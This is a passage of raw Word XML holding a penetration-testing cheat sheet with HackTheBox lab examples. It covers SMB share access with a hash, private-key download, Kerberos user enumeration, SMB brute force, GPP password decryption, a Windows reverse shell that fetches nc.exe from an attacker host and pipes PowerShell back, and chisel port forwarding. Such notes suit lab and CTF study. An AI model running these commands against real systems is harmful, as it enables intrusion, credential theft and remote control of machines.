          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A9AC6" w14:textId="1B6369F2" w:rsidR="00E4236E" w:rsidRDefault="00E4236E" w:rsidP="00E4236E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Download Newly Found File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE42FCC" w14:textId="6A9D90D8" w:rsidR="00E4236E" w:rsidRPr="00045222" w:rsidRDefault="00045222" w:rsidP="000452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 xml:space="preserve">smbmap -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;sambaNTP&gt;&gt;:&lt;&lt;sambaNTP&gt;&gt;’ -H </w:t>
      </w:r>
      <w:r w:rsidR="000F2187">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --download &lt;&lt;shareName&gt;&gt;/&lt;&lt;filename&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40966B7B" w14:textId="183D8022" w:rsidR="00045222" w:rsidRDefault="00045222" w:rsidP="0004522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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A694769" w14:textId="27D10B49" w:rsidR="00045222" w:rsidRDefault="00045222" w:rsidP="00045222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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smbmap -u alice1978 -p ‘0B13672F89372DBC:0B13672F89372DBC’ -H 10.10.10.107 --download alice/my_private_key.ppk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AAB535" w14:textId="091988AF" w:rsidR="00EF6C1D" w:rsidRDefault="00EF6C1D" w:rsidP="00EF6C1D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339D61A4" w14:textId="4AAC4F4D" w:rsidR="00EF6C1D" w:rsidRDefault="00EF6C1D" w:rsidP="00EF6C1D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B2652" w14:textId="52EE4939" w:rsidR="00EF6C1D" w:rsidRDefault="00EF6C1D" w:rsidP="00EF6C1D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7BE62D" w14:textId="157E73DF" w:rsidR="00EF6C1D" w:rsidRDefault="00EF6C1D" w:rsidP="00EF6C1D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01F005" w14:textId="39461FB5" w:rsidR="007951F1" w:rsidRPr="00CF6C26" w:rsidRDefault="00EF6C1D" w:rsidP="007951F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IP address to </w:t>
      </w:r>
      <w:r w:rsidR="00EF51A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">top of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/resolv.conf like: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nameserver &lt;&lt;IP&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5562E8" w14:textId="25AF5BA2" w:rsidR="001F4835" w:rsidRDefault="00B06EF1" w:rsidP="00843766">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00843766">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>erbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B15C4" w14:textId="1AB768B3" w:rsidR="00B06EF1" w:rsidRDefault="003200E4" w:rsidP="003200E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumerate Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09384D4F" w14:textId="71057F53" w:rsidR="003200E4" w:rsidRPr="00ED3568" w:rsidRDefault="006200B7" w:rsidP="006200B7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ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./kerbrute_linux_amd64 userenum -d </w:t>
      </w:r>
      <w:r w:rsidR="00F87FBB" w:rsidRPr="00ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;domain&gt;&gt; &lt;&lt;users_file&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF28437" w14:textId="10D24EDC" w:rsidR="00F87FBB" w:rsidRDefault="00F87FBB" w:rsidP="00F87FB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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2800CC" w14:textId="6D84B56F" w:rsidR="00F87FBB" w:rsidRPr="00ED3568" w:rsidRDefault="00F87FBB" w:rsidP="00F87FBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./kerbrute_linux_amd64 userenum -d fabricorp.local </w:t>
      </w:r>
      <w:r w:rsidR="00E54E5A" w:rsidRPr="00ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/root</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Desktop/HackTheBox/fuse/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17315392" w14:textId="6352A02B" w:rsidR="00ED3568" w:rsidRDefault="00ED3568" w:rsidP="00ED3568">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D76B3C" w14:textId="5244BECB" w:rsidR="00ED3568" w:rsidRDefault="00ED3568" w:rsidP="00ED3568">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cewl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32585268" w14:textId="281CFA90" w:rsidR="00ED3568" w:rsidRDefault="00ED3568" w:rsidP="00ED3568">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get Words from Webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC527B9" w14:textId="23F6CE2C" w:rsidR="00ED3568" w:rsidRPr="00ED3568" w:rsidRDefault="00ED3568" w:rsidP="00ED3568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ED3568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cewl -d &lt;&lt;depth&gt;&gt; -m &lt;&lt;min-word-length&gt;&gt; --with-numbers -w cewl.out &lt;&lt;url&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5030E5" w14:textId="6C084849" w:rsidR="00ED3568" w:rsidRDefault="00ED3568" w:rsidP="00ED356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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA1295" w14:textId="361D1F35" w:rsidR="00ED3568" w:rsidRPr="0080469A" w:rsidRDefault="00ED3568" w:rsidP="00ED356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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl -d 7 -m 8 --with-numbers -w cewl.out </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AE3B4B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://fuse.fabricorp.out</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="164300AF" w14:textId="36C88CF1" w:rsidR="0080469A" w:rsidRDefault="0080469A" w:rsidP="0080469A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D3D424" w14:textId="68488438" w:rsidR="0080469A" w:rsidRDefault="0080469A" w:rsidP="0080469A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41053F72" w14:textId="43BE7A7F" w:rsidR="0080469A" w:rsidRDefault="0080469A" w:rsidP="0080469A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bruteforce SMB Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E22BD" w14:textId="5E2A58B8" w:rsidR="0080469A" w:rsidRPr="001259AF" w:rsidRDefault="0080469A" w:rsidP="008046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 xml:space="preserve">crackmapexec smb &lt;&lt;IP&gt;&gt; -u &lt;&lt;users-file&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00950541">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-p &lt;&lt;pass-file&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A60B7" w14:textId="655A04E3" w:rsidR="001259AF" w:rsidRDefault="001259AF" w:rsidP="001259AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497A779E" w14:textId="633F1E74" w:rsidR="001259AF" w:rsidRDefault="001259AF" w:rsidP="001259AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gpp-decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07803949" w14:textId="1FD2056B" w:rsidR="001259AF" w:rsidRDefault="001259AF" w:rsidP="001259AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Got a cpassword?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE6C29" w14:textId="42E04D74" w:rsidR="00821186" w:rsidRPr="00821186" w:rsidRDefault="00821186" w:rsidP="00125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example, within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726AE8A" w14:textId="6349FF27" w:rsidR="001259AF" w:rsidRPr="001259AF" w:rsidRDefault="001259AF" w:rsidP="00125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>gpp-decrypt &lt;&lt;hash&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF568F2" w14:textId="1AF30A8C" w:rsidR="001259AF" w:rsidRDefault="001259AF" w:rsidP="001259A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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E85D5F" w14:textId="192BBF8A" w:rsidR="001259AF" w:rsidRPr="00426FAE" w:rsidRDefault="001259AF" w:rsidP="001259A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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gpp-decrypt </w:t>
      </w:r>
      <w:r w:rsidRPr="001259AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5FDCBC" w14:textId="4201F298" w:rsidR="00426FAE" w:rsidRDefault="00426FAE" w:rsidP="00426FAE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC477BA" w14:textId="0703D1BF" w:rsidR="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38924808" w14:textId="3C6D7B2E" w:rsidR="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List all Items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B69BA" w14:textId="0648DEC1" w:rsidR="00DC3C26" w:rsidRPr="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C2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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn ls svn://&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496432E" w14:textId="1129068A" w:rsidR="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Look at Commit History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECA03D" w14:textId="75ED3C51" w:rsidR="00DC3C26" w:rsidRPr="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C2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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn log svn://&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FF480" w14:textId="7A6051D3" w:rsidR="00DC3C26" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Checkout the Repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C301598" w14:textId="629D9B0F" w:rsidR="00DC3C26" w:rsidRPr="004308DB" w:rsidRDefault="00DC3C26" w:rsidP="00DC3C2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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn checkout svn://&lt;&lt;ip&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53527FD1" w14:textId="0E226921" w:rsidR="004308DB" w:rsidRDefault="004308DB" w:rsidP="004308DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change to Different Revision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5927D45A" w14:textId="22CD8B32" w:rsidR="004308DB" w:rsidRPr="00D96906" w:rsidRDefault="00BB1719" w:rsidP="004308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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn</w:t>
      </w:r>
      <w:r w:rsidR="00D96906">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> up -r &lt;&lt;revision&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4261B8CF" w14:textId="168769A3" w:rsidR="00D96906" w:rsidRDefault="00D96906" w:rsidP="00D9690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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC5918" w14:textId="1E3FEBFB" w:rsidR="00D96906" w:rsidRPr="00D534CF" w:rsidRDefault="00D96906" w:rsidP="00D96906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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn up -r 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CC5EA" w14:textId="2C832AD4" w:rsidR="00D534CF" w:rsidRDefault="00D534CF" w:rsidP="00D534CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Checkout Specific Revision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0EC355" w14:textId="1349A67F" w:rsidR="00D534CF" w:rsidRPr="00D50B21" w:rsidRDefault="00D534CF" w:rsidP="00D534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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svn checkout svn://&lt;&lt;ip&gt;&gt; -r &lt;&lt;revision&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8524E4" w14:textId="7FB5A0AB" w:rsidR="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B21">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E1B42F" w14:textId="14E8DBF3" w:rsidR="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B21">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse Shell in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444ABB4A" w14:textId="71812AB5" w:rsidR="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B21">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03504BDB" w14:textId="3AE979F0" w:rsidR="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uploading nc</w:t>
      </w:r>
      <w:r w:rsidR="00C8246F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (assuming initial foothold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75811C72" w14:textId="45D2E96D" w:rsidR="00D50B21" w:rsidRPr="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B2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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00E17D03">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://&lt;&lt;attacker-ip&gt;&gt;/nc.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00737133">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A7188" w14:textId="21FE7D8A" w:rsidR="00D50B21" w:rsidRDefault="00D50B21" w:rsidP="00D50B21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Getting reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22E0F0" w14:textId="2D02B208" w:rsidR="00D50B21" w:rsidRPr="008369D7" w:rsidRDefault="00D50B21" w:rsidP="00D50B2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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc.exe &lt;&lt;attacker-ip&gt;&gt; &lt;&lt;attacker-port&gt;&gt; -e powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B74B22C" w14:textId="3FFD477A" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ABE7C3" w14:textId="47E718E1" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B23F17" w14:textId="5C2B168B" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0CAD61" w14:textId="0D646F1B" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F99E9E1" w14:textId="73F50907" w:rsidR="00925D67" w:rsidRDefault="00925D67" w:rsidP="00925D67">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610724DD" w14:textId="032077A0" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chisel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C8A24" w14:textId="5E3104E6" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting up Server (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995D8E1" w14:textId="7457A107" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008369D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./chisel_linux server --reverse --port 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C990F0" w14:textId="51931227" w:rsidR="008369D7" w:rsidRDefault="008369D7" w:rsidP="008369D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting up Client (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C40F5" w14:textId="3EF66F4A" w:rsidR="008369D7" w:rsidRPr="00494DC8" w:rsidRDefault="00D309A8" w:rsidP="00611A7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494DC8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.\chisel.exe client &lt;&lt;attacker-ip&gt;&gt;:&lt;&lt;attacker-port&gt;&gt; R:&lt;&lt;port&gt;&gt;:localhost:&lt;&lt;port&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1845D3" w14:textId="29685C39" w:rsidR="00494DC8" w:rsidRDefault="00494DC8" w:rsidP="00494DC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e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6CCE0" w14:textId="0F4011D2" w:rsidR="00494DC8" w:rsidRPr="00494DC8" w:rsidRDefault="00494DC8" w:rsidP="00494DC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494DC8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.\chisel.ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e client 10.10.14.72:1234 R:3306:localhost:3306</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00494DC8" w:rsidRPr="00494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9A21C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04047F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D7A91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="550E5A42"/>
    <w:lvl w:ilvl="0" w:tplc="201417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D37A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A4648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3376A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="529A4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97"/>
    <w:rsid w:val="00014575"/>
    <w:rsid w:val="00045222"/>
    <w:rsid w:val="00056C49"/>
    <w:rsid w:val="00086DAB"/>
    <w:rsid w:val="000A3859"/>
    <w:rsid w:val="000F2187"/>
    <w:rsid w:val="000F264D"/>
    <w:rsid w:val="000F4ECF"/>
    <w:rsid w:val="001259AF"/>
    <w:rsid w:val="001801E8"/>
